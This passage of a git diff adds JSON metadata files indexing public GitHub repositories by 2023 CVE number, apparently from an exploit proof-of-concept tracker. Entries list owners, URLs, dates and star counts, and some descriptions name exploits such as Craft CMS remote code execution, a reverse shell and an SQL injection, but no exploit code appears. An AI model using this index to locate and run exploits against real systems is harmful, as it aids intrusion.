688440471, + "name": "CVE-2023-41535", + "full_name": "Sh33talUmath\/CVE-2023-41535", + "owner": { + "login": "Sh33talUmath", + "id": 144338561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144338561?v=4", + "html_url": "https:\/\/github.com\/Sh33talUmath", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sh33talUmath\/CVE-2023-41535", + "description": null, + "fork": false, + "created_at": "2023-09-07T11:01:04Z", + "updated_at": "2023-09-07T11:01:05Z", + "pushed_at": "2023-09-07T11:01:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41564.json b/2023/CVE-2023-41564.json new file mode 100644 index 0000000000..2031208740 --- /dev/null +++ b/2023/CVE-2023-41564.json @@ -0,0 +1,33 @@ +[ + { + "id": 867687521, + "name": "cve-2023-41564-research", + "full_name": "sota70\/cve-2023-41564-research", + "owner": { + "login": "sota70", + "id": 46929379, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46929379?v=4", + "html_url": "https:\/\/github.com\/sota70", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sota70\/cve-2023-41564-research", + "description": null, + "fork": false, + "created_at": "2024-10-04T14:26:21Z", + "updated_at": "2024-10-04T14:31:33Z", + "pushed_at": "2024-10-04T14:31:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41575.json b/2023/CVE-2023-41575.json new file mode 100644 index 0000000000..900923a085 --- /dev/null +++ b/2023/CVE-2023-41575.json @@ -0,0 +1,33 @@ +[ + { + "id": 683348712, + "name": "Stored-xss", + "full_name": "SoundarXploit\/Stored-xss", + "owner": { + "login": "SoundarXploit", + "id": 26168410, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26168410?v=4", + "html_url": "https:\/\/github.com\/SoundarXploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SoundarXploit\/Stored-xss", + "description": "Got My CVE Published CVE-2023-41575", + "fork": false, + "created_at": "2023-08-26T09:26:35Z", + "updated_at": "2023-09-23T06:43:31Z", + "pushed_at": "2023-09-23T06:43:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41592.json b/2023/CVE-2023-41592.json new file mode 100644 index 0000000000..081661ed0e --- /dev/null +++ b/2023/CVE-2023-41592.json @@ -0,0 +1,95 @@ +[ + { + "id": 786209842, + "name": "CVE-2023-41592-2", + "full_name": "miguelc49\/CVE-2023-41592-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-41592-2", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:46:32Z", + "updated_at": "2024-04-14T17:40:42Z", + "pushed_at": "2024-04-14T17:40:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209864, + "name": "CVE-2023-41592-1", + "full_name": "miguelc49\/CVE-2023-41592-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-41592-1", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:46:36Z", + "updated_at": "2024-04-14T17:40:35Z", + "pushed_at": "2024-04-14T17:40:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209884, + "name": "CVE-2023-41592-3", + "full_name": "miguelc49\/CVE-2023-41592-3", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-41592-3", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:46:40Z", + "updated_at": "2024-04-22T17:46:16Z", + "pushed_at": "2024-04-22T17:46:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41593.json b/2023/CVE-2023-41593.json new file mode 100644 index 0000000000..f12eae80ff --- /dev/null +++ b/2023/CVE-2023-41593.json @@ -0,0 +1,33 @@ +[ + { + "id": 688347969, + "name": "CVE", + "full_name": "MATRIXDEVIL\/CVE", + "owner": { + "login": "MATRIXDEVIL", + "id": 92071491, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92071491?v=4", + "html_url": "https:\/\/github.com\/MATRIXDEVIL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MATRIXDEVIL\/CVE", + "description": "CVE-2023-41593", + "fork": false, + "created_at": "2023-09-07T06:59:09Z", + "updated_at": "2023-09-07T06:59:10Z", + "pushed_at": "2023-09-07T07:11:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41613.json b/2023/CVE-2023-41613.json new file mode 100644 index 0000000000..a3ad35c387 --- /dev/null +++ b/2023/CVE-2023-41613.json @@ -0,0 +1,33 @@ +[ + { + "id": 684143893, + "name": "cve-2023-41613", + "full_name": "Eafz\/cve-2023-41613", + "owner": { + "login": "Eafz", + "id": 55439965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55439965?v=4", + "html_url": "https:\/\/github.com\/Eafz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Eafz\/cve-2023-41613", + "description": null, + "fork": false, + "created_at": "2023-08-28T14:45:23Z", + "updated_at": "2023-12-08T00:33:13Z", + "pushed_at": "2023-12-05T06:44:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41623.json b/2023/CVE-2023-41623.json new file mode 100644 index 0000000000..01379fae66 --- /dev/null +++ b/2023/CVE-2023-41623.json @@ -0,0 +1,33 @@ +[ + { + "id": 728954859, + "name": "wuhaozhe-s-CVE", + "full_name": "GhostBalladw\/wuhaozhe-s-CVE", + "owner": { + "login": "GhostBalladw", + "id": 136776282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136776282?v=4", + "html_url": "https:\/\/github.com\/GhostBalladw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GhostBalladw\/wuhaozhe-s-CVE", + "description": "CVE-2023-41623", + "fork": false, + "created_at": "2023-12-08T04:15:06Z", + "updated_at": "2023-12-08T04:15:06Z", + "pushed_at": "2023-12-15T07:53:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41646.json b/2023/CVE-2023-41646.json new file mode 100644 index 0000000000..42f7ce39cc --- /dev/null +++ b/2023/CVE-2023-41646.json @@ -0,0 +1,33 @@ +[ + { + "id": 686063462, + "name": "CVE-2023-41646", + "full_name": "tristao-marinho\/CVE-2023-41646", + "owner": { + "login": "tristao-marinho", + "id": 101610912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101610912?v=4", + "html_url": "https:\/\/github.com\/tristao-marinho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tristao-marinho\/CVE-2023-41646", + "description": null, + "fork": false, + "created_at": "2023-09-01T16:46:07Z", + "updated_at": "2023-09-01T16:46:07Z", + "pushed_at": "2023-09-01T16:51:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4165.json b/2023/CVE-2023-4165.json new file mode 100644 index 0000000000..46a71ceb14 --- /dev/null +++ b/2023/CVE-2023-4165.json @@ -0,0 +1,33 @@ +[ + { + "id": 685807414, + "name": "CVE-2023-4165", + "full_name": "mvpyyds\/CVE-2023-4165", + "owner": { + "login": "mvpyyds", + "id": 87457452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87457452?v=4", + "html_url": "https:\/\/github.com\/mvpyyds", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mvpyyds\/CVE-2023-4165", + "description": null, + "fork": false, + "created_at": "2023-09-01T03:55:23Z", + "updated_at": "2023-09-01T03:56:08Z", + "pushed_at": "2023-09-01T05:31:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41652.json b/2023/CVE-2023-41652.json new file mode 100644 index 0000000000..88a95b11a6 --- /dev/null +++ b/2023/CVE-2023-41652.json @@ -0,0 +1,33 @@ +[ + { + "id": 884788732, + "name": "CVE-2023-41652", + "full_name": "RandomRobbieBF\/CVE-2023-41652", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-41652", + "description": "RSVPMarker <= 10.6.6 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-11-07T11:49:36Z", + "updated_at": "2024-11-07T11:51:54Z", + "pushed_at": "2024-11-07T11:51:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4166.json b/2023/CVE-2023-4166.json new file mode 100644 index 0000000000..6a44f16c28 --- /dev/null +++ b/2023/CVE-2023-4166.json @@ -0,0 +1,33 @@ +[ + { + "id": 685829767, + "name": "CVE-2023-4166", + "full_name": "mvpyyds\/CVE-2023-4166", + "owner": { + "login": "mvpyyds", + "id": 87457452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87457452?v=4", + "html_url": "https:\/\/github.com\/mvpyyds", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mvpyyds\/CVE-2023-4166", + "description": null, + "fork": false, + "created_at": "2023-09-01T05:33:38Z", + "updated_at": "2023-10-12T07:15:33Z", + "pushed_at": "2023-09-01T05:36:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4169.json b/2023/CVE-2023-4169.json new file mode 100644 index 0000000000..63fd3b1d8d --- /dev/null +++ b/2023/CVE-2023-4169.json @@ -0,0 +1,33 @@ +[ + { + "id": 705480946, + "name": "CVE-2023-4169_CVE-2023-3306_CVE-2023-4415", + "full_name": "thedarknessdied\/CVE-2023-4169_CVE-2023-3306_CVE-2023-4415", + "owner": { + "login": "thedarknessdied", + "id": 56123966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56123966?v=4", + "html_url": "https:\/\/github.com\/thedarknessdied", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thedarknessdied\/CVE-2023-4169_CVE-2023-3306_CVE-2023-4415", + "description": "Ruijie-RG-EW1200G CVE-2023-4169_CVE-2023-3306_CVE-2023-4415", + "fork": false, + "created_at": "2023-10-16T05:08:06Z", + "updated_at": "2024-07-06T01:05:43Z", + "pushed_at": "2023-10-18T12:27:17Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41717.json b/2023/CVE-2023-41717.json new file mode 100644 index 0000000000..6e9614b917 --- /dev/null +++ b/2023/CVE-2023-41717.json @@ -0,0 +1,33 @@ +[ + { + "id": 685433459, + "name": "CVE-2023-41717", + "full_name": "federella\/CVE-2023-41717", + "owner": { + "login": "federella", + "id": 38486839, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38486839?v=4", + "html_url": "https:\/\/github.com\/federella", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/federella\/CVE-2023-41717", + "description": "This repository is to provide a write-up and PoC for CVE-2023-41717.", + "fork": false, + "created_at": "2023-08-31T08:10:22Z", + "updated_at": "2024-08-12T20:32:39Z", + "pushed_at": "2023-08-31T09:51:35Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4174.json b/2023/CVE-2023-4174.json new file mode 100644 index 0000000000..3a90e9d2c3 --- /dev/null +++ b/2023/CVE-2023-4174.json @@ -0,0 +1,33 @@ +[ + { + "id": 677308989, + "name": "CVE-2023-4174", + "full_name": "d0rb\/CVE-2023-4174", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2023-4174", + "description": "CVE-2023-4174 PoC", + "fork": false, + "created_at": "2023-08-11T08:48:02Z", + "updated_at": "2023-08-11T08:48:49Z", + "pushed_at": "2023-08-11T08:48:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41772.json b/2023/CVE-2023-41772.json new file mode 100644 index 0000000000..ec6bf4c020 --- /dev/null +++ b/2023/CVE-2023-41772.json @@ -0,0 +1,33 @@ +[ + { + "id": 733456895, + "name": "CVE-2023-41772", + "full_name": "R41N3RZUF477\/CVE-2023-41772", + "owner": { + "login": "R41N3RZUF477", + "id": 63357997, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63357997?v=4", + "html_url": "https:\/\/github.com\/R41N3RZUF477", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/R41N3RZUF477\/CVE-2023-41772", + "description": null, + "fork": false, + "created_at": "2023-12-19T11:21:12Z", + "updated_at": "2024-05-16T06:46:13Z", + "pushed_at": "2023-12-24T10:47:00Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41892.json b/2023/CVE-2023-41892.json new file mode 100644 index 0000000000..e172c64ab6 --- /dev/null +++ b/2023/CVE-2023-41892.json @@ -0,0 +1,161 @@ +[ + { + "id": 701130009, + "name": "CVE-2023-41892", + "full_name": "zaenhaxor\/CVE-2023-41892", + "owner": { + "login": "zaenhaxor", + "id": 83585135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83585135?v=4", + "html_url": "https:\/\/github.com\/zaenhaxor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zaenhaxor\/CVE-2023-41892", + "description": "CVE-2023-41892 - Craft CMS Remote Code Execution (RCE)", + "fork": false, + "created_at": "2023-10-06T01:40:34Z", + "updated_at": "2025-01-06T20:18:22Z", + "pushed_at": "2023-10-07T03:26:00Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736015392, + "name": "CraftCMS_CVE-2023-41892", + "full_name": "0xfalafel\/CraftCMS_CVE-2023-41892", + "owner": { + "login": "0xfalafel", + "id": 4268373, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4268373?v=4", + "html_url": "https:\/\/github.com\/0xfalafel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xfalafel\/CraftCMS_CVE-2023-41892", + "description": "Exploit for CVE-2023-41892", + "fork": false, + "created_at": "2023-12-26T18:31:27Z", + "updated_at": "2024-09-21T19:17:31Z", + "pushed_at": "2023-12-26T22:39:21Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749723508, + "name": "Craft-CMS-Exploit", + "full_name": "diegaccio\/Craft-CMS-Exploit", + "owner": { + "login": "diegaccio", + "id": 152712974, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152712974?v=4", + "html_url": "https:\/\/github.com\/diegaccio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/diegaccio\/Craft-CMS-Exploit", + "description": "CVE-2023-41892 Reverse Shell", + "fork": false, + "created_at": "2024-01-29T09:12:59Z", + "updated_at": "2024-09-17T01:41:03Z", + "pushed_at": "2024-02-01T21:38:58Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "craftcms", + "cve-2023-41892", + "reverse-shell" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 763685345, + "name": "CVE-2023-41892", + "full_name": "acesoyeo\/CVE-2023-41892", + "owner": { + "login": "acesoyeo", + "id": 127269737, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127269737?v=4", + "html_url": "https:\/\/github.com\/acesoyeo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/acesoyeo\/CVE-2023-41892", + "description": "A Craft CMS vulnerability that allows Remote Code Execution (RCE).", + "fork": false, + "created_at": "2024-02-26T18:31:46Z", + "updated_at": "2024-02-26T18:34:15Z", + "pushed_at": "2024-02-26T19:14:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834427246, + "name": "HTTP-Request-for-PHP-object-injection-attack-on-CVE-2023-41892", + "full_name": "CERTologists\/HTTP-Request-for-PHP-object-injection-attack-on-CVE-2023-41892", + "owner": { + "login": "CERTologists", + "id": 176203032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176203032?v=4", + "html_url": "https:\/\/github.com\/CERTologists", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CERTologists\/HTTP-Request-for-PHP-object-injection-attack-on-CVE-2023-41892", + "description": null, + "fork": false, + "created_at": "2024-07-27T08:31:18Z", + "updated_at": "2024-07-27T08:39:33Z", + "pushed_at": "2024-07-27T08:39:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4197.json b/2023/CVE-2023-4197.json new file mode 100644 index 0000000000..c3e4ac25f5 --- /dev/null +++ b/2023/CVE-2023-4197.json @@ -0,0 +1,33 @@ +[ + { + "id": 805950324, + "name": "CVE-2023-4197", + "full_name": "alien-keric\/CVE-2023-4197", + "owner": { + "login": "alien-keric", + "id": 102582785, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102582785?v=4", + "html_url": "https:\/\/github.com\/alien-keric", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alien-keric\/CVE-2023-4197", + "description": "this is a simple script from CVE-2023-4197 that was little bit modified since because it didn't work at first time with broadlight machine from HTB which means that we have to modify the script a little bit and then use it as how the ducumentation says", + "fork": false, + "created_at": "2024-05-25T23:45:30Z", + "updated_at": "2024-05-25T23:51:46Z", + "pushed_at": "2024-05-25T23:51:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41991.json b/2023/CVE-2023-41991.json new file mode 100644 index 0000000000..5829ff5793 --- /dev/null +++ b/2023/CVE-2023-41991.json @@ -0,0 +1,33 @@ +[ + { + "id": 724861098, + "name": "CVE-2023-41991", + "full_name": "Zenyith\/CVE-2023-41991", + "owner": { + "login": "Zenyith", + "id": 119261527, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119261527?v=4", + "html_url": "https:\/\/github.com\/Zenyith", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zenyith\/CVE-2023-41991", + "description": null, + "fork": false, + "created_at": "2023-11-28T23:59:40Z", + "updated_at": "2024-08-27T23:33:22Z", + "pushed_at": "2023-11-28T00:53:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41993.json b/2023/CVE-2023-41993.json new file mode 100644 index 0000000000..0fe02f32a9 --- /dev/null +++ b/2023/CVE-2023-41993.json @@ -0,0 +1,167 @@ +[ + { + "id": 705224501, + "name": "POC-for-CVE-2023-41993", + "full_name": "po6ix\/POC-for-CVE-2023-41993", + "owner": { + "login": "po6ix", + "id": 61380567, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61380567?v=4", + "html_url": "https:\/\/github.com\/po6ix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/po6ix\/POC-for-CVE-2023-41993", + "description": null, + "fork": false, + "created_at": "2023-10-15T12:14:18Z", + "updated_at": "2024-12-31T07:18:24Z", + "pushed_at": "2024-03-08T12:57:53Z", + "stargazers_count": 197, + "watchers_count": 197, + "has_discussions": false, + "forks_count": 34, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 34, + "watchers": 197, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 705738898, + "name": "cve-2023-41993-test", + "full_name": "hrtowii\/cve-2023-41993-test", + "owner": { + "login": "hrtowii", + "id": 68852354, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68852354?v=4", + "html_url": "https:\/\/github.com\/hrtowii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hrtowii\/cve-2023-41993-test", + "description": "testing poc", + "fork": false, + "created_at": "2023-10-16T15:43:50Z", + "updated_at": "2024-09-03T07:10:23Z", + "pushed_at": "2023-10-18T17:58:35Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 17, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 705857370, + "name": "CVE-2023-41993", + "full_name": "0x06060606\/CVE-2023-41993", + "owner": { + "login": "0x06060606", + "id": 47062591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47062591?v=4", + "html_url": "https:\/\/github.com\/0x06060606", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x06060606\/CVE-2023-41993", + "description": "CVE-2023-41993", + "fork": false, + "created_at": "2023-10-16T20:34:02Z", + "updated_at": "2024-10-02T21:51:08Z", + "pushed_at": "2024-11-18T22:40:13Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-41993", + "exploit", + "hacktoberfest", + "hacktoberfest2023", + "ios", + "iphone", + "macos", + "webkit" + ], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707881504, + "name": "cve-test", + "full_name": "Mangaia\/cve-test", + "owner": { + "login": "Mangaia", + "id": 21020827, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21020827?v=4", + "html_url": "https:\/\/github.com\/Mangaia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mangaia\/cve-test", + "description": "testing cve-2023-41993-test", + "fork": false, + "created_at": "2023-10-20T22:04:40Z", + "updated_at": "2023-10-20T22:04:41Z", + "pushed_at": "2023-10-20T22:04:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 764522978, + "name": "CVE-2023-41993", + "full_name": "J3Ss0u\/CVE-2023-41993", + "owner": { + "login": "J3Ss0u", + "id": 90192954, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90192954?v=4", + "html_url": "https:\/\/github.com\/J3Ss0u", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/J3Ss0u\/CVE-2023-41993", + "description": null, + "fork": false, + "created_at": "2024-02-28T08:27:43Z", + "updated_at": "2024-02-28T08:32:07Z", + "pushed_at": "2024-02-28T08:38:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4206.json b/2023/CVE-2023-4206.json new file mode 100644 index 0000000000..9a2697e26b --- /dev/null +++ b/2023/CVE-2023-4206.json @@ -0,0 +1,33 @@ +[ + { + "id": 731880804, + "name": "Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208", + "full_name": "hshivhare67\/Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208", + "description": null, + "fork": false, + "created_at": "2023-12-15T05:13:24Z", + "updated_at": "2023-12-15T05:18:44Z", + "pushed_at": "2023-12-15T12:57:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 